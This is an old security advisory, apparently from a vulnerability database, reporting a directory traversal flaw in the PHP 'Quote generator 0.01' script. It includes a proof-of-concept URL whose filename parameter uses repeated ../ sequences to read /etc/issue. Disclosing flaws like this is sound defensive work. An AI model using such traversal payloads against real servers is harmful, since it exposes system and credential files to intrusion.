Quote generator 0.01 by Eric Persson

2001-04-27T00:00:00
ID SECURITYVULNS:DOC:1562
Type securityvulns
Reporter Securityvulns
Modified 2001-04-27T00:00:00

Description

Hi all,

Quote generator 0.01 (php script) by eric personn is vulnerable to the ../.. bug try this : www.yourhost.com/quote.html?filename=../../../../../../../../../../../../../ ../../../etc/issue&path_to_font_file=ariali.ttf

It gives you the content of /etc/issue file

regards,


Cabezon Aurйlien iSecureLabs team http://www.iSecureLabs.com French Staff